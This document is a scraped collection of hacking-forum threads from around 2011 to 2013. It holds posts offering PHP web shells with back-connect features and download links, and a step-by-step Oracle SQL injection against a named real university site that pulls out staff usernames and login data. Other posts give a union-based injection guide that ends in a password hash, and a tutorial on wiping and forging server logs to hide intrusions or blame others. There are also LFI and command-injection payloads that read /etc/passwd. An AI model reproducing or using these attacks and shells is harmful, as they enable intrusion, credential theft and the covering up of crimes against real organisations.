Web Application Security - iExploit

WSO 2.5

undead — Sun, 19 Feb 2012 00:05:23 -0500

Features:

This utility provides a web interface for remote operation c operating system and its services / daemons.
Opportunity Description / features:
Authorization for the cookies
Server Information
File manager (copy, rename, move, delete, chmod, touch, create files and folders)
View, hexview, editing, downloading, uploading files
Working with zip archives (packing, unpacking) + compression tar.gz
Console
SQL Manager (MySql, PostgreSql)
Execute PHP code
Working with Strings + hash search online databases
Bindport and back-Connect (Perl)
Bruteforce FTP, MySQL, PgSQL
Search files, search text in files
Support for * nix-like and Windows systems
Antipoiskovik (check User-Agent, if a search engine then returns 404 error)
You can use AJAX
Small size. Packaged version is 22.8 Kb
The choice of encoding, which employs a shell.

Screenshot:[spoiler]
http://i.imgur.com/j2HIJ.png[/spoiler]

I edited the source a bit so the login screen now looks like this:

[spoiler]http://i.imgur.com/unQXZ.png
[/spoiler]

Default password: root
(if you want to change it change the auth_pass variable value with your md5 encoded password. http://www.adamek.biz/md5-generator.php)

http://pastebin.com/Qra8yeWX

BEST HACKING SERVERS ARCHIVE !

SuperMario — Sun, 21 Apr 2013 04:42:14 -0400

Hello , today I want to share with you this site :

www.c99.me

It has very good stuff and most of them were priv8.

You can check there and see.

Few Exploits i found, enjoy...

Mr. P-teo — Wed, 19 Dec 2012 13:18:10 -0500

So i know this forum is sort of dead but here are a few exploits i found in a couple of MyBB plugins, one being stored XSS and the other Post SQL Injection allowing the user to become an admin.

MyBB Xbox Live ID Post SQLi & Persistent XSS Vulnerabilities: http://1337day.com/exploit/description/19971

MyBB AJAX Chat Persistent XSS Vulnerability: http://1337day.com/exploit/description/19952

Hope these help soneone out and maybe go towards getting this forum a little more active.

PostgreSQL

iTTS3cur3 — Thu, 11 Apr 2013 04:20:42 -0400

Hi Everyone,

I'm busy learning and testing SQL injections with a PostgreSQL backend with multiple DB's. I'm using SQLMAP but can only enumerate 1 DB and it always defaults to public? Is there a way of enumerating all the DB's?

Kind Regards

Anyone got a tutorial for SQLi

Mr. P-teo — Sat, 13 Aug 2011 19:14:25 -0400

Basically i have found that sites with a version less than 5 dont show the tables with standard injection, so my question is does anyone have or know of a tutorial for injecting these sites???

NEW SHELL] G6 v1.1 PHP Web Shell .: Coded By Mr. P-teo :.

Mr. P-teo — Sat, 05 Jan 2013 08:31:39 -0500

So here it is guys the latest version of my shell, although there are still some bugs to be worked out and Download file isn't working i thought id share this with the community as i currently have no plans to update it for a while. No Time.

So heres some of the features:

File Browser
File Edit
File Delete
File Upload
Mass Mailer
Terminal, (exec, pass_thru, system)
PHP execution
Self Remove
Hash Identifier
Back Connect
Server Information
Small FileSize
Plus...

So dont flame etc. This is free and has a small file size. Unlike most shells. Also this is 100% NOT backdoored.

Updated a little since these screens but oh well.

Image Hosted By Gavii.com

http://gavii.com/puld/1292545809.png

Enjoy.

Download Link: http://adfoc.us/11410316132487

injection on Java Server Pages (jsp) based

schumbag — Mon, 15 Aug 2011 11:08:42 -0400

ok,we'll trying it

http://www.mmu.edu.my/

it's vulnerable

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436

like ussually,used a magic quotes

https://icems.mmu.edu.my/doe/doe_detail ... 001034436'

SQL Error - ORA-00933: SQL command not properly ended

and like our knowing at jsp extension using an oracle for databse application

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=1--

No. # Title(Specialization)
1 Web Programming
2 Data Mining
3 C Programming
4 Java Programming
5 Web Design
6 Visual Basic

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2--

No. # Title(Specialization)
No record found!

--check sum column with order by (like a mysql commands)

https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=1 order by 1--
still not error??try again!!

https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=1 order by 2--

damn!!!still not error (_ _")

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=1 order by 3--

SQL Error - ORA-01785: ORDER BY item must be the number of a SELECT-list expression

look at there,was reading!!if error at 3rd column that's mean them just 2 column have used

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select 1,2--

SQL Error - ORA-00923: FROM keyword not found where expected

yeah,like that

--used command table dual (default command at oracle)

https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=2 union all select 1,2 from dual--

SQL Error - ORA-01790: expression must have same datatype as corresponding expression

dont' be confused,so why make a command table dual??
for references go here...
http://en.wikipedia.org/wiki/DUAL_table

right,after thats numb we'll change with 'null' <= not used semicolon

https://icems.mmu.edu.my/doe/doe_detail ... 001034436' and 1=2 union all select null,null from dual--

No. # Title(Specialization) 1 null

wow sudah tidak error lagi :D
hey,XSS bug also!!we'll try that

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null, '<iframe width=1000 height=700 src=http://iexploit.org></iframe>' FROM dual--

but,i'll next step at jsp injection
but this is differentwith sqlinjection using mysql for database application

--if an oracle version checked at the inside column banner to the table v$version
example :

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,banner FROM v$version--

No. # Title(Specialization)
1 Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi
2 PL/SQL Release 10.2.0.1.0 - Production
3 CORE 10.2.0.1.0 Production
4 TNS for Linux: Version 10.2.0.1.0 - Production
5 NLSRTL Version 10.2.0.1.0 - Production

see??

now,we'll check at username with commands :

user FROM dual--

like this :

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,user FROM dual--

and the username is . . .. ICEM_WEB

look at the database:)

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,global_name FROM global_name--

explore again!!!

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,'database-->' || global_name FROM global_name--

1 database-->ICEMS.WORLD

maybe this one an oracle advantage, could be more neat in appearance and good looking

if in mysql we use for combining the command string make --> concat(str1,str2)

but at mssql we used --> str1 + str2

but we're try at oracle --> str1 || str2

end off,the intermezzo,now we're continous
let we looked users at table all_users,make commands :
username from all_users--
example :

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,username from all_users--

No. # Title(Specialization)
1 SYS
2 SYSTEM
3 OUTLN

*SKIP => too long
not important :P but if you will dump it's ok
maybe,we can got CC (lol)

--look at all table and user... for next column table_name and owner at table all_tables

we used again command like a before but modifying :)
and look the result

nama_pemilik_table-->nama_table

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,owner || '-->' || table_name from all_tables--

1 SYS-->DUAL
2 SYS-->SYSTEM_PRIVILEGE_MAP
3 SYS-->TABLE_PRIVILEGE_MAP
4 SYS-->STMT_AUDIT_OPTION_MAP
5 SYSTEM-->DEF$_TEMP$LOB
6 WMSYS-->WM$WORKSPACES_TABLE
7 WMSYS-->WM$VERSION_TABLE

*SKIP = > too long

458 ICEM_USER-->ICEMS_LOGO
459 ICEM_USER-->SOSC_PAYMENT
460 ICEM_USER-->STAFF_PROFILE

*SKIP AGAIN => too long

524 SYSTEM-->OL$
525 SYS-->WRI$_ADV_ASA_RECO_DATA
526 ICEM_USER-->EXAM_STUD_SCHEDULE_BKP
527 ICEM_USER-->OAE_QUE

*EXPLANATION
table all_tables this is like with information_schema.tables if at mysql injection
they saved tables name (table_name).

look at there this content

ICEM_USER-->STAFF_PROFILE

that's make me curious table STAFF_PROFILE

-look at columns table STAFF_PROFILE --> used all_tab_columns

this is like an information_schema.columns
and his function saved column_name

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,column_name from all_tab_columns where table_name='STAFF_PROFILE'--

look again the content:

STAFF_USERNAME, STAFF_NAME sama STAFF_LOGIN

https://icems.mmu.edu.my/doe/doe_detail.jsp?id=1001034436' and 1=2 union all select null,STAFF_USERNAME || ' : ' || STAFF_NAME || ' : ' || STAFF_LOGIN from STAFF_PROFILE--

so,next step you must looking for admin page :)

*NOTE : maybe you guys will laugh with the web since 2010 still not patching i'm attacking because of cyber war
between indonesian vs malaysian 1 years ago *LOL

Help on kind of LFI

Didac — Sun, 10 Feb 2013 23:37:33 -0500

Hi, i found a web aplication with a kind of LFI and i tested know ways of exploiting but it only fails
the /self/environ returns blank
if i am wrong, log poisonning is useless because the code doesnt include the local file
tried to view the tomcat users and password file but are commented
the os is Centos 5.9, apache tomcat 7.0.34 have cpanel

here is the code is a jsp file but i think the server also support php

<%@page import="java.io.FileInputStream"%>
<%@page import="java.io.File"%>
<%@page import="java.io.OutputStream" %>

<%
    String titulo = request.getParameter("T");

    String path = request.getServletContext().getRealPath("")
            + "/WEB-INF/pdf/" + titulo + ".pdf";
    File file = new File(path);

    try {
        FileInputStream fis = new FileInputStream(file);
        byte[] pdf = new byte[(int) file.length()];
        fis.read(pdf, 0, (int) file.length());
        fis.close();

        response.setContentType("application/pdf");
        OutputStream os = response.getOutputStream();
        os.write(pdf);
        os.close();

    } catch (Exception e) {
        response.setContentType("text/html;charset=UTF-8");
        out.print("

PDF no encontrado

");
        out.close();
    }
%>

the nmap gived this report of services

21/tcp   open ftp?
|_ftp-anon: ERROR: Script execution failed (use -d to debug)
|_ftp-bounce: no banner
22/tcp   open ssh?
25/tcp   open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp   open domain?
80/tcp   open http?
110/tcp open pop3?
143/tcp open imap?
| imap-capabilities:
|_ ERROR: Failed to connect to server
443/tcp open https?
587/tcp open submission?
|_smtp-commands: Couldn't establish connection on port 587
993/tcp open imaps?
995/tcp open pop3s?
8080/tcp open http-proxy?

What can i do to gain RCE?

PD: sorry for my english

SQL Union Based Inj3ction

DazHolmes — Wed, 07 Nov 2012 22:16:26 -0500

________                  ___ ___        .__                         
\______ \ _____  ________/   |   \  ____ |  |   _____   ____   ______
 |    |  \\__  \ \___   /    ~    \/  _ \|  |  /     \_/ __ \ /  ___/
 |    `   \/ __ \_/    /\    Y    (  <_> )  |_|  Y Y  \  ___/ \___ \ 
/_______  (____  /_____ \\___|_  / \____/|____/__|_|  /\___  >____  >
        \/     \/      \/      \/                   \/     \/     \/

##By Daz Holmes Inj3ct0rs
## www.example.com/post.php?id=276 Order by 10-- :No Error At it's highest table.
## www.example.com/post.php?id=276 union all select 1,2,3,4,5,6,7,8,9,10-- :Their will Appear some numbers

##The Number you Need will be Black and bold Witch is in my case is 6
##www.example.com/post.php?id=276 union all select 1,2,3,4,5,version(),7,8,9,10-- :So Now You take, the Number 6 and replace with Version() This will give you the version of the sql database 5.1.61-0+squeeze1
## www.example.com/post.php?id=276 union all select 1,2,3,4,5,table_name,7,8,9,10 from information_schema.tables :Now Remove the Version and add table_name And take the -- of the end and add from information_schema.tables Now you see the tables I see ck_users Now you will need to code this into ascii So here is the, link http://easycalculation.com/ascii-hex.php
When u type in their u will want the Equivalent Decimal / Ascii Value And u need to remove the spaces like so 99,107,95,117,115,101,114,115
Now Add this to you're following link from information_schema.columns where table_name=char(99,107,95,117,115,101,114,115 )-- With you're own code And change Table_names to column_name

ADMIN NOTICE: We do not condone unlawful attacks against any network, private, or public. -m0rph

You should look like this

http://www.example.com/post.php?id=276 union all select 1,2,3,4,5,column_name,7,8,9,10 from information_schema.columns where table_name=char(99,107,95,117,115,101,114,115 )--

##Now i See password. Now remove Column_name And add password and Remove all the rest you should look like this

http://www.example.com/post.php?id=276 union all select 1,2,3,4,5,password,7,8,9,10 from ck_users--

#So now i see the md5 hash password 7bf5d02375375bb1066f2ebb8b9e0fff Hope, this helped. End results look like this.

Doubt regarding Local File Inclusion(PHP Knowledge enough)

XinR — Wed, 02 Jan 2013 12:37:58 -0500

Let this be the LFI Vulnerable script

$file = str_replace('../', '', $_GET['file']);
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>

And we pass
http://example.com/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd to attack

But how exactly is the file included now? Wont the scipt now be equivalent so that $file = ..%2F..%2F..%2F..%2Fetc%2Fpasswd

Only browser knows 2F = '/' so how can server include the file? HOw does it exactly understands it??

Danks>

Xin R

Hide your Hacks, Small Tut.

Mr. P-teo — Mon, 03 Sep 2012 07:59:24 -0400

Hiding Your Tracks When Hacking

So Step one. Error Logs.
Errors are offen used in web hacking to gather information from the sites database or includes, some examples of these are:
SQLi - Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in
LFI - Warning: include(includes/../) [function.include]: failed to open stream: No such file or directory in
FPD - Warning: htmlspecialchars_decode() expects parameter 1 to be string, array given in /home

The problem with these errors is that most of the time they are logged in a file called error_log. Usually found in the /public_html/ use your shell to edit the file.

The file will contain all errors found on the site and the url in which the error occured. Simple enough, remove all of the errors that you caused.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

So Step Two. .lastLogin

Depending on how you uploaded your shell this may not need doing. Some admin panels record the last login on a file called .lastLogin, this will record nothing but your IP address, hence always use protection.

This file can usually be found in the/home/sitename/ directory, use your shell to edit the file with a random ip and your all good.

Save your changes and move on.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

So Step Three. Access-Logs.
Access logs will be the main focus of this tutorial as they gather a fair bit of information from your http request to the site. They will gather the URL you used your IP and browser plus a few other bits and bobs.

As you can see this is where you will be able to start blaming other people for the hacks, or making it seem as if you were never there. Now to find this file simply navigate to the following directory - home/sitename/access-logs/

Within this directory there will be a file called yoursitename.com Use your shell to edit the file, within you will find contents similar to

127.0.0.1 - [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326 "http://www.example.com/start.html"; "Mozilla/4.08 [en] (Win98; I ;Nav)"

Now at the start there is an IP, then Date and Time, nexr there is a small bigt you dont need to worrie about. And finally there is the url your requested and accesed and the browser you used.

If you want to blame the hack on someone else, i recommend you change the IP and the browser to Mozilla or Iexplore. If you want to hide your tracks completely delete the whole line.

Once done, save changed and exit your shell. If you click any links within the shell it will record them and all that will have been usless. This is always the last thing to do on a server when your leaving the shell.

I would always recommend you use a VPN or at least a proxy as well as an extra layer of security. If your thinking, Whats the worst that would happen? well view my friends twitter and you will see. Look at the sites he's hacked and look at his most recent posts - https://twitter.com/bzyklon

Hope this helps some new commers.

Code execution

Hardcore-Gabber — Fri, 04 May 2012 20:58:57 -0400

So . i have scanned a site and founde some vulns XSS etc ... but i have finde an interesting vuln too .. The vuln is Code execution ..
but i have a problem with this vuln .. the problem is that i cannot recognize what encode type is using Acunetix when is encoding this command ...

&cat /etc/passwd& this is the command when is not encoded and now when is encoded %26cat%20%2fetc%2fpasswd%26

Please cane tell me what encode type is this and also how could i upload a shell with this vuln ...

also i have made some screens of this vuln ...

http://imageshack.us/g/190/82307930x.png/

SQL InJecTion Problem

a_tek7 — Sat, 01 Sep 2012 17:03:45 -0400

I was testing a website and by adding a little ' at the end of

asp?id=23'

I found the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'id like '%23'%''.

/fa/articlev.asp, line 20

then I tried this one:

asp?id=23 or 1=1--

now no error but no text is being displayed but web theme is being displayed.

I want to know it is exploitable? how can I do it? I've never test Microsoft Access Drive.

How to use / to LFI

laterain — Thu, 20 Dec 2012 01:02:34 -0500

vul.php code:

<%php

$xx = $_REQUEST['xx'];

require("./te$xx.php");

I have a webshell at ./shell.txt

We can GET /vul.php?xx=/../shell.txt%00 to get a shell,

but the php version must before 5.3.4!

However,I had heard another way to get a shell !

The way is : we can GET /vul.php?xx=/../shell.txt////////////////////////////////(here is so many '/')

But,I can't get the shell at last!

Here is the check code:

$xx = 'shell.txt';

for($i=0;$i<=1000000;$i++) {

$xx .= '/';

}

require("./$xx.php");

Somebody had got a shell by this way!

Did the php have this bug?

Can you help me ? Thx.

PS:I'm not good at English,sorry.

FPD Recon Vulnerability On Wordpress 3.4.2

Mr. P-teo — Sun, 02 Dec 2012 08:35:29 -0500

So i thought id share something which i stumbled upon earlier today, after a bit of research i discovered it wasn't just the site i was building that was vuln to Full Path Disclosure but almost all Wordpress sites.

As FPD isn't massively useful unless you'r gathering info i thought i'd share it with you guys.

So where can you find this vuln?

Most Wordpress themes include a functions.php file which links to other files and it's this file which has the vulnerability.

So just view the source of a wordpress site and visit the link of the CSS file, then change the CSS file name to [b]functions.php[/b].

If you need an example try my site that is no longer in use. http://urbanscoop.net

So if your looking to do a little recon on a wordpress site this should help you.

How to make Time based blind injection with sqlmap ?

bakie — Thu, 29 Nov 2012 11:26:47 -0500

How to make Time based blind injection with sqlmap ?

I wanna know Time based blind injection with sqlmap in detail

plx explain and live demo wanna see

how to inject like this url with sqlmap or other tool or manual

bakie — Fri, 23 Nov 2012 07:32:15 -0500

When url www.site.com/view.php?var=15&name=old

To specify the parameter in SQLmap all you have to do is use a -p switch as shown below,

./sqlmap.py -u "http://www.site.com/view.php?var=15&name=old" -p "var"

when url http://www.site.com/index.php/en/library/category/37-2012-ydb

1) How can I inject with sqlmap ?

2) How many types for the sql injections ?

I wanna know detail bro , plz help me

is there any book out the for understanding browser internals ?

mandi — Sat, 08 Sep 2012 08:47:27 -0400

hi guys,

as the title says is there any books available for understanding internal working of browser ?

i am much interested in understanding how browsers work ?(in detail) what are the
security features out there,how they are implemented and all..

as far as i had searched i couldn't find any thing.

so decided to ask here,if you have any recommendations please post here :)

Assigning the return value of new by reference is deprecated bug

a_tek7 — Tue, 04 Sep 2012 01:20:07 -0400

I was visiting a website and I found these errors at the top of the page:

Deprecated: Assigning the return value of new by reference is deprecated in /data/32/1/91/103/1743918/user/1883987/htdocs/AAAAA/inc/items/model/_item.class.php on line 3032

Warning: Cannot modify header information - headers already sent by (output started at /data/32/1/91/103/1743918/user/1883987/htdocs/hacktivision/inc/_main.inc.php:205) in/data/32/1/91/103/1743918/user/1883987/htdocs/AAAAAA/inc/skins/_skin.funcs.php on line 379

Are these error indicate some kind of vulnerability and exploitable??what this vulnerability called?

Regards

A_tek7

[OutDated] - Free G6 Web PHP Shell - Coded by Mr. P-teo

Mr. P-teo — Tue, 28 Aug 2012 16:33:35 -0400

So, a while back i started working on a PHP shell as i wanted to improve my PHP knowledge, so far its been private with only a few testing the shell. i plan to add many more features but
currently i want to get some opinions of my work so far, and what could be added. I know there is an issue with the upload, im working on it. And i haven't managed to bypass "GET Method not implemented" yet.

So Here are some screenshots.

Features
File Explore
Read File Source Code
File Upload
Teminal
Back Connect
Server Information
Hash Identifier
Admin Finder

Going to be adding:
Web-Based Proxy Browser
Dos
Symlink

Here is the source - http://pastebin.com/kTweecrm

Note i will be updating it soon.